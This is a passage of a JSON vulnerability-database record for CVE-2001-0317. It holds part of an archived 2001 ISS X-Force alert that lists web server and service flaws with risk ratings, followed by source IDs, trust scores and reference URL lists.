HSWeb Web Server allows attacker to browse directories\nX-Force URL:            http://xforce.iss.net/static/6061.php\n\n_____\n\nDate Reported:          2/4/01\nVulnerability:          sedum-directory-traversal\nPlatforms Affected:     SEDUM\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      SEDUM HTTP Server directory traversal\nX-Force URL:            http://xforce.iss.net/static/6063.php\n\n_____\n\nDate Reported:          2/4/01\nVulnerability:          free-java-directory-traversal\nPlatforms Affected:     Free Java\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      Free Java Web Server directory traversal\nX-Force URL:            http://xforce.iss.net/static/6064.php\n\n_____\n\nDate Reported:          2/2/01\nVulnerability:          goahead-directory-traversal\nPlatforms Affected:     GoAhead\nRisk Factor:            High\nAttack Type:            Network Based\nBrief Description:      GoAhead Web Server directory traversal\nX-Force URL:            http://xforce.iss.net/static/6046.php\n\n_____\n\nDate Reported:          2/2/01\nVulnerability:          gnuserv-tcp-cookie-overflow\nPlatforms Affected:     Gnuserv\nRisk Factor:            High\nAttack Type:            Network/Host Based\nBrief Description:      Gnuserv TCP enabled cookie buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6056.php\n\n_____\n\nDate Reported:          2/2/01\nVulnerability:          xmail-ctrlserver-bo\nPlatforms Affected:     Xmail CTRLServer\nRisk Factor:            High\nAttack Type:            Network Based\nBrief Description:      XMail CTRLServer buffer overflow\nX-Force URL:            http://xforce.iss.net/static/6060.php\n\n_____\n\nDate Reported:          2/2/01\nVulnerability:          netscape-webpublisher-acl-permissions\nPlatforms Affected:     Netscape Web Publisher\nRisk Factor:            Medium\nAttack Type:            Network Based\nBrief Description:      Netcape Web Publisher poor ACL permissions\nX-Force URL:            http://xforce.iss.net/static/6058.php\n\n_____\n\nDate Reported:          2/1/01\nVulnerability:          cups-httpgets-dos\nPlatforms Affected:     CUPS\nRisk Factor:            High\nAttack Type:            Host Based\nBrief Description:      CUPS httpGets() function denial of service\nX-Force URL:            http://xforce.iss.net/static/6043.php\n\n_____\n\nDate Reported:          2/1/01\nVulnerability:          prospero-get-pin\nPlatforms Affected:     Prospero\nRisk Factor:            High\nAttack Type:            Network/Host Based\nBrief Description:      Prospero GET request reveals PIN information\nX-Force URL:            http://xforce.iss.net/static/6044.php\n\n_____\n\nDate Reported:          2/1/01\nVulnerability:          prospero-weak-permissions\nPlatforms Affected:     Prospero\nRisk Factor:            High\nAttack Type:            Network/Host Based\nBrief Description:      Prospero uses weak permissions\nX-Force URL:            http://xforce.iss.net/static/6045.php\n\n_____\n\nRisk Factor Key:\n\n        High    Any vulnerability that provides an attacker with immediate\n                access into a machine, gains superuser access, or bypasses\n                a firewall.  Example:  A vulnerable Sendmail 8.6.5 version\n                that allows an intruder to execute commands on mail\n                server. \n        Medium  Any vulnerability that provides information that has a\n                high potential of giving system access to an intruder. \n                Example: A misconfigured TFTP or vulnerable NIS server\n                that allows an intruder to get the password file that\n                could contain an account with a guessable password. \n        Low     Any vulnerability that provides information that\n                potentially could lead to a compromise.  Example:  A\n                finger that allows an intruder to find out who is online\n                and potential accounts to attempt to crack passwords\n                via brute force methods. \n\n________\n\n\nISS is a leading global provider of security management solutions for\ne-business. By offering best-of-breed SAFEsuite(tm) security software,\ncomprehensive ePatrol(tm) monitoring services and industry-leading\nexpertise, ISS serves as its customers\u0027 trusted security provider\nprotecting digital assets and ensuring the availability, confidentiality and\nintegrity of computer systems and information critical to e-business\nsuccess. ISS\u0027 security management solutions protect more than 5,000\ncustomers including 21 of the 25 largest U.S. commercial banks, 9 of the 10\nlargest telecommunications companies and over 35 government agencies. \nFounded in 1994, ISS is headquartered in Atlanta, GA, with additional\noffices throughout North America and international operations in Asia,\nAustralia, Europe and Latin America. For more information, visit the ISS Web\nsite at www.iss.net or call 800-776-2362. \n\nCopyright (c) 2001 by Internet Security Systems, Inc. \n\nPermission is hereby granted for the redistribution of this Alert\nelectronically.  It is not to be edited in any way without express consent\nof the X-Force.  If you wish to reprint the whole or any part of this Alert\nin any other medium excluding electronic medium, please e-mail\nxforce@iss.net for permission. \n\nDisclaimer\n\nThe information within this paper may change without notice. Use of this\ninformation constitutes acceptance for use in an AS IS condition. There are\nNO warranties with regard to this information. In no event shall the author\nbe liable for any damages whatsoever arising out of or in connection with\nthe use or spread of this information. Any use of this information is at the\nuser\u0027s own risk. \n\n\n\nX-Force PGP Key available at: http://xforce.iss.net/sensitive.php as \nwell as on MIT\u0027s PGP key server and PGP.com\u0027s key server. \n\nPlease send suggestions, updates, and comments to: X-Force xforce@iss.net\nof Internet Security Systems, Inc. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: 2.6.3a\nCharset: noconv\n\niQCVAwUBOqb8ojRfJiV99eG9AQGEaAP+KH+SQYNBsbUcv/mUJNUz7dDPIYVcmPNV\n1xyO/ctnG6qScWnlXGltYS7Rj8T8tYAAZC77oDhFSvvs8CX1Dr32ImEyvOIJhMLA\nh0wKCV3HOAYJ662BASe3jbO3nL/bumNKCRL5heuIU85pQOuH9xbqXkmFEimDmG2B\ntT+ylKw4hn4=\n=kfHg\n-----END PGP SIGNATURE-----\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2001-0317"
      },
      {
        "db": "CERT/CC",
        "id": "VU#290140"
      },
      {
        "db": "CERT/CC",
        "id": "VU#13877"
      },
      {
        "db": "CERT/CC",
        "id": "VU#25309"
      },
      {
        "db": "CERT/CC",
        "id": "VU#945216"
      },
      {
        "db": "CERT/CC",
        "id": "VU#566640"
      },
      {
        "db": "CERT/CC",
        "id": "VU#651994"
      },
      {
        "db": "CERT/CC",
        "id": "VU#315308"
      },
      {
        "db": "BID",
        "id": "2347"
      },
      {
        "db": "BID",
        "id": "5114"
      },
      {
        "db": "BID",
        "id": "2405"
      },
      {
        "db": "PACKETSTORM",
        "id": "24431"
      }
    ],
    "trust": 6.84
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#13877",
        "trust": 3.2
      },
      {
        "db": "CERT/CC",
        "id": "VU#945216",
        "trust": 2.4
      },
      {
        "db": "CERT/CC",
        "id": "VU#25309",
        "trust": 2.4
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0317",
        "trust": 1.6
      },
      {
        "db": "BID",
        "id": "5114",
        "trust": 1.1
      },
      {
        "db": "BID",
        "id": "2347",
        "trust": 1.1
      },
      {
        "db": "BID",
        "id": "2405",
        "trust": 1.1
      },
      {
        "db": "XF",
        "id": "6083",
        "trust": 0.9
      },
      {
        "db": "XF",
        "id": "6135",
        "trust": 0.9
      },
      {
        "db": "XF",
        "id": "6063",
        "trust": 0.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#290140",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "6449",
        "trust": 0.8
      },
      {
        "db": "CERT/CC",
        "id": "VU#566640",
        "trust": 0.8
      },
      {
        "db": "BID",
        "id": "2335",
        "trust": 0.8
      },
      {
        "db": "CERT/CC",
        "id": "VU#651994",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "6472",
        "trust": 0.8
      },
      {
        "db": "CERT/CC",
        "id": "VU#315308",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "6080",
        "trust": 0.7
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2001:013",
        "trust": 0.6
      },
      {
        "db": "CALDERA",
        "id": "CSSA-2001-009",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20010213 TRUSTIX SECURITY ADVISORY - PROFTPD, KERNEL",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-038",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "6115",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6075",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6149",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6145",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6136",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6065",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6157",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6058",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6161",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6109",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6121",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6062",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6137",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6101",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6089",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6072",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6143",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6084",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6100",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6071",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6073",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6116",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6144",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6104",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6094",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6087",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6090",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6046",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6056",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6060",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6130",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6092",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6118",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6117",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6098",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6156",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6113",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6067",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6064",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6045",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6147",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6095",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6131",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6114",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6134",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6074",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6044",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6112",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6077",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6148",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6146",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6078",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6110",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6132",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6099",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6079",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6102",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6096",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6142",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6091",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6158",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6162",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6163",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6155",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6081",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6160",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6111",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6152",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6068",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6043",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6076",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6103",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6070",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6133",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6153",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6082",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6124",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6061",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6066",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6097",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6105",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6159",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6069",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6093",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6139",
        "trust": 0.1
      },
      {
        "db": "XF",
        "id": "6151",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "24431",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#290140"
      },
      {
        "db": "CERT/CC",
        "id": "VU#13877"
      },
      {
        "db": "CERT/CC",
        "id": "VU#25309"
      },
      {
        "db": "CERT/CC",
        "id": "VU#945216"
      },
      {
        "db": "CERT/CC",
        "id": "VU#566640"
      },
      {
        "db": "CERT/CC",
        "id": "VU#651994"
      },
      {
        "db": "CERT/CC",
        "id": "VU#315308"
      },
      {
        "db": "BID",
        "id": "2347"
      },
      {
        "db": "BID",
        "id": "5114"
      },
      {
        "db": "BID",
        "id": "2405"
      },
      {
        "db": "PACKETSTORM",
        "id": "24431"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0317"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-038"
      }
    ]
  },
  "id": "VAR-200105-0064",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.8770026
  },
  "last_update_date": "2023-12-18T11:09:33.896000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2001-0317"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.kb.cert.org/vuls/id/13877"
      },
      {
        "trust": 2.4,
        "url": "http://www.ssh.com/products/ssh/cert/"
      },
      {
        "trust": 1.6,
        "url": "http://www.cert.org/advisories/ca-2001-35.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.kb.cert.org/vuls/id/945216"
      },
      {
        "trust": 1.6,
        "url": "http://www.kb.cert.org/vuls/id/25309"
      },
      {
        "trust": 1.6,
        "url": "http://archives.neohapsis.com/archives/bugtraq/2001-02/0267.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.caldera.com/support/security/advisories/cssa-2001-009.0.txt"
      },
      {
        "trust": 1.6,
        "url": "http://www.redhat.com/support/errata/rhsa-2001-013.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.cisco.com/warp/public/707/ssh-scanning.shtml"
      },
      {
        "trust": 1.1,
        "url": "http://www.cisco.com/warp/public/707/ssh-multiple-pub.html"
      },
      {
        "trust": 1.0,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/6080"
      },
      {
        "trust": 0.9,
        "url": "http://xforce.iss.net/static/6083.php"
      },
      {
        "trust": 0.9,
        "url": "http://xforce.iss.net/static/6135.php"
      },
      {
        "trust": 0.9,
        "url": "http://xforce.iss.net/static/6063.php"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/5114"
      },
      {
        "trust": 0.8,
        "url": "http://www.corest.com/files/files/11/crc32.pdf"
      },
      {
        "trust": 0.8,
        "url": "http://www1.corest.com/common/showdoc.php?idx=131\u0026idxseccion=10"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/static/6449.php"
      },
      {
        "trust": 0.8,
        "url": "http://razor.bindview.com/publish/advisories/adv_ssh1crc.html"
      },
      {
        "trust": 0.8,
        "url": "http://www1.corest.com/common/showdoc.php?idx=81\u0026idxsection=10#"
      },
      {
        "trust": 0.8,
        "url": "http://www.openssh.com/security.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/2347"
      },
      {
        "trust": 0.8,
        "url": "http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/alerts/advise100.php"
      },
      {
        "trust": 0.8,
        "url": "http://www.cryptnet.net/fcp/audit/pgp4pine/01.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/2405"
      },
      {
        "trust": 0.8,
        "url": "http://devrandom.net/lists/archives/2001/2/bugtraq/0383.html"
      },
      {
        "trust": 0.8,
        "url": "http://security-archive.merton.ox.ac.uk/bugtraq-200102/0389.html"
      },
      {
        "trust": 0.8,
        "url": "http://pgp4pine.flatline.de/"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/2335"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/archive/1/160452"
      },
      {
        "trust": 0.8,
        "url": "http://xforce.iss.net/static/6472.php"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/6080"
      },
      {
        "trust": 0.3,
        "url": "http://www.netscreen.com/index.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.netscreen.com/support/alerts/11_06_02.html"
      },
      {
        "trust": 0.3,
        "url": "http://support.coresecurity.com/impact/exploits/56f46f9564b53fc1bca5bef469b60df7.html"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/298289"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/298274"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/298288"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6144.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6091.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6149.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6156.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6153.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6060.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6078.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6098.php"
      },
      {
        "trust": 0.1,
        "url": "https://www.iss.net"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6103.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6130.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6109.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6073.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6061.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6064.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6043.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6069.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6114.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6097.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6145.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6099.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6151.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6132.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6148.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6070.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6118.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6115.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6062.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6092.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6105.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6046.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6157.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6076.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6111.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6143.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6045.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6104.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6124.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6082.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6116.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6077.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6152.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6079.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6084.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6133.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6160.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6080.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6044.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6089.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6162.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6137.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6112.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6147.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6090.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6117.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6094.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6056.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6110.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/alerts/vol-6_num-4.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6074.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6155.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6058.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6102.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6121.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6139.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6146.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6081.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6095.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6071.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6159.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6134.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6100.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/maillists/index.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6101.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6096.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6066.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6113.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6093.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6065.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6087.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6068.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/sensitive.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6072.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6158.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6142.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6067.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6161.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6136.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6075.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6131.php"
      },
      {
        "trust": 0.1,
        "url": "http://xforce.iss.net/static/6163.php"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#290140"
      },
      {
        "db": "CERT/CC",
        "id": "VU#13877"
      },
      {
        "db": "CERT/CC",
        "id": "VU#25309"
      },
      {
        "db": "CERT/CC",
        "id": "VU#945216"
      },
      {
        "db": "CERT/CC",
        "id": "VU#566640"
      },
      {
        "db": "CERT/CC",
        "id": "VU#651994"
      },
      {
        "db": "CERT/CC",
        "id": "VU#315308"
      },
      {
        "db": "BID",
        "id": "2347"
      },
      {
        "db": "BID",
        "id": "5114"
      },
      {
        "db": "PACKETSTORM",
        "id": "24431"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0317"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-038"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#290140"
      },
      {
        "db": "CERT/CC",
        "id": "VU#13877"
      },
      {
        "db": "CERT/CC",
        "id": "VU#25309"
      },
      {
        "db": "CERT/CC",
        "id": "VU#945216"
      },
      {
        "db": "CERT/CC",
        "id": "VU#566640"
      },
      {
        "db": "CERT/CC",
        "id": "VU#651994"
      },
      {
        "db": "CERT/CC",
        "id": "VU#315308"
      },
      {
        "db": "BID",
        "id": "2347"
      },
      {
        "db": "BID",
        "id": "5114"
      },
      {
        "db": "BID",
        "id": "2405"
      },
      {
        "db": "PACKETSTORM",
        "id": "24431"
      },
      {
        "db": "NVD",
        "id": "CVE-2001-0317"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-038"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2002-06-27T00:00:00",
        "db": "CERT/CC",
        "id": "VU#290140"
      },
      {
        "date": "2001-11-07T00:00:00",
        "db": "CERT/CC",
        "id": "VU#13877"
      },
      {
        "date": "2000-09-26T00:00:00",
        "db": "CERT/CC",
        "id": "VU#25309"
      },
      {
        "date": "2001-10-24T00:00:00",
        "db": "CERT/CC",
        "id": "VU#945216"
      },
      {
        "date": "2001-07-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#566640"
      },
      {
        "date": "2001-05-16T00:00:00",
        "db": "CERT/CC",
        "id": "VU#651994"
      },
      {
        "date": "2001-01-18T00:00:00",
        "db": "CERT/CC",
        "id": "VU#315308"
      },
      {
        "date": "2001-02-08T00:00:00",
        "db": "BID",
        "id": "2347"
      },
      {
        "date": "2002-06-27T00:00:00",
        "db": "BID",
        "id": "5114"
      },
      {
        "date": "2001-02-20T00:00:00",
        "db": "BID",
        "id": "2405"
      },
      {
        "date": "2001-03-13T23:54:42",
        "db": "PACKETSTORM",
        "id": "24431"
      },
      {
        "date": "2001-05-03T04:00:00",
        "db": "NVD",
        "id": "CVE-2001-0317"
      },
      {
        "date": "2001-05-03T00:00:00",
        "db": "CNNVD",
